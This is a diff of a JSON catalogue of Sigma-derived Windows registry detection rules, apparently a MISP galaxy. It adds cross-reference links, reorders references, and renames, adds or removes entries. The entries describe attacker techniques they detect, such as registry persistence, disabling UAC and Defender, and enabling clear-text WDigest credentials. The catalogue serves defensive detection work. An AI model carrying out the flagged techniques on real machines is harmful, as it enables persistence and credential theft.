], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "value": "Chafer Activity - Registry" }, @@ -11792,6 +14949,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "value": "Pandemic Registry Key" }, @@ -11816,6 +14982,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "value": "Removal Of Index Value to Hide Schedule Task" }, @@ -11866,6 +15041,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", "value": "Removal Of SD Value to Hide Schedule Task" }, @@ -11931,11 +15115,11 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", - "https://github.com/OTRF/detection-hackathon-apt29/issues/7", - "https://docs.microsoft.com/en-us/windows/win32/shell/launch", "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ @@ -11967,6 +15151,15 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "value": "Windows Registry Persistence COM Key Linking" }, @@ -11983,8 +15176,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" ], "tags": [ @@ -12017,6 +15210,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", "value": "Sysinternals SDelete Registry Keys" }, @@ -12041,6 +15243,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "value": "Usage of Suspicious Sysinternals Tools" }, @@ -12057,8 +15268,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml" ], "tags": [ @@ -12089,6 +15300,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", "value": "Usage of Renamed Sysinternals Tools" }, @@ -12106,10 +15326,10 @@ "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" ], "tags": [ @@ -12166,6 +15386,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "value": "Usage of Sysinternals Tools - Registry" }, @@ -12183,7 +15412,6 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", - "https://attack.mitre.org/techniques/T1037/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" ], "tags": [ @@ -12192,6 +15420,15 @@ "attack.lateral_movement" ] }, + "related": [ + { + "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" }, @@ -12208,9 +15445,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "https://twitter.com/Hexacorn/status/991447379864932352", + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ @@ -12218,9 +15455,52 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", "value": "Execution DLL of Choice Using WAB.EXE" }, + { + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + ], + "filename": "registry_set_persistence_app_paths.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ] + }, + "related": [ + { + "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "value": "Potential Persistence Via App Paths Default Property" + }, { "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", "meta": { @@ -12234,8 +15514,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" ], "tags": [ @@ -12246,6 +15526,15 @@ "cve.2021.31979" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", "value": "CVE-2021-31979 CVE-2021-33771 Exploits" }, @@ -12274,28 +15563,28 @@ "value": "Activate Suppression of Windows Security Center Notifications" }, { - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "meta": { - "author": "frack113", - "creation_date": "2022/08/20", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", "falsepositive": [ - "Legitimate use of the dll." + "Unknown" ], - "filename": "registry_set_scrobj_dll_persistence.yml", - "level": "medium", + "filename": "registry_set_persistence_chm.yml", + "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.persistence" ] }, - "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "value": "Scrobj.dll COM Hijacking" + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "Potential Persistence Via CHM Helper DLL" }, { "description": "Detects potential persistence using Appx DebugPath", @@ -12319,8 +15608,17 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", - "value": "Windows Registry Persistence DebugPath" + "value": "Potential Persistence Using DebugPath" }, { "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", @@ -12343,6 +15641,15 @@ "attack.t1112" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", "value": "CrashControl CrashDump Disabled" }, @@ -12368,6 +15675,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", "value": "Disable UAC Using Registry" }, @@ -12384,8 +15700,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" ], "tags": [ @@ -12420,34 +15736,6 @@ "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "value": "Registry Explorer Policy Modification" }, - { - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "meta": { - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", - "creation_date": "2018/04/11", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_globalflags_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" - ] - }, - "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", - "value": "Potential GlobalFlags Registry Persistence Attempt" - }, { "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "meta": { @@ -12470,7 +15758,7 @@ ] }, "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", - "value": "Modify Attachment Manager Settings - Associations" + "value": "Potential Attachment Manager Settings Associations Tamper" }, { "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", @@ -12512,8 +15800,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ @@ -12537,13 +15825,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ @@ -12555,30 +15843,6 @@ "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "value": "RDP Sensitive Settings Changed to Zero" }, - { - "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_ie_persistence.yml", - "level": "low", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", - "value": "Modification of IE Registry Settings" - }, { "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", "meta": { @@ -12618,8 +15882,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" ], "tags": [ @@ -12628,6 +15892,15 @@ "attack.t1546.009" ] }, + "related": [ + { + "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", "value": "Session Manager Autorun Keys Modification" }, @@ -12655,6 +15928,29 @@ "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", "value": "Add Debugger Entry To Hangs Key For Persistence" }, + { + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_execution_policy.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "value": "Potential PowerShell Execution Policy Tampering" + }, { "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", "meta": { @@ -12678,6 +15974,22 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", "value": "COM Hijack via Sdclt" }, @@ -12718,8 +16030,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" ], "tags": [ @@ -12743,9 +16055,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://twitter.com/inversecos/status/1494174785621819397", - "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" ], "tags": [ @@ -12781,6 +16093,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "value": "CobaltStrike Service Installations in Registry" }, @@ -12808,6 +16129,40 @@ "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" }, + { + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/10", + "falsepositive": [ + "Legitimate Addin Installation" + ], + "filename": "registry_set_persistence_office_vsto.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_vivami/status/1347925307643355138", + "https://vanmieghem.io/stealth-outlook-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" + ], + "tags": [ + "attack.t1137.006", + "attack.persistence" + ] + }, + "related": [ + { + "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "value": "Potential Persistence Via Visual Studio Tools for Office" + }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { @@ -12822,10 +16177,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" ], "tags": [ @@ -12849,8 +16204,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", + "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" ], "tags": [ @@ -12858,6 +16213,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", "value": "Suspicious Keyboard Layout Load" }, @@ -12885,31 +16249,6 @@ "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", "value": "Disable Tamper Protection on Windows Defender" }, - { - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/01/10", - "falsepositive": [ - "Legitimate Addin Installation" - ], - "filename": "registry_set_office_vsto_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://vanmieghem.io/stealth-outlook-persistence/", - "https://twitter.com/_vivami/status/1347925307643355138", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" - ], - "tags": [ - "attack.t1137.006", - "attack.persistence" - ] - }, - "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", - "value": "Stealthy VSTO Persistence" - }, { "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", "meta": { @@ -12948,8 +16287,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" ], "tags": [ @@ -12982,6 +16321,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f281b83-0200-4b34-bf35-d24687ea57c2", "value": "ETW Logging Disabled For SCM" }, @@ -13022,8 +16370,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/codesigning.html", "https://github.com/gtworek/PSBits/tree/master/SIP", + "https://persistence-info.github.io/Data/codesigning.html", "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" ], @@ -13033,6 +16381,15 @@ "attack.t1553.003" ] }, + "related": [ + { + "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", "value": "Persistence Via New SIP Provider" }, @@ -13051,8 +16408,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" ], "tags": [ @@ -13108,6 +16465,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "value": "Disable Microsoft Defender Firewall via Registry" }, @@ -13133,6 +16499,15 @@ "attack.t1574" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", "value": "Potential Registry Persistence Attempt Via DbgManagedDebugger" }, @@ -13181,6 +16556,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8023f872-3f1d-4301-a384-801889917ab4", "value": "Usage of Renamed Sysinternals Tools - RegistrySet" }, @@ -13197,8 +16581,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" ], "tags": [ @@ -13206,6 +16590,15 @@ "attack.t1546.015" 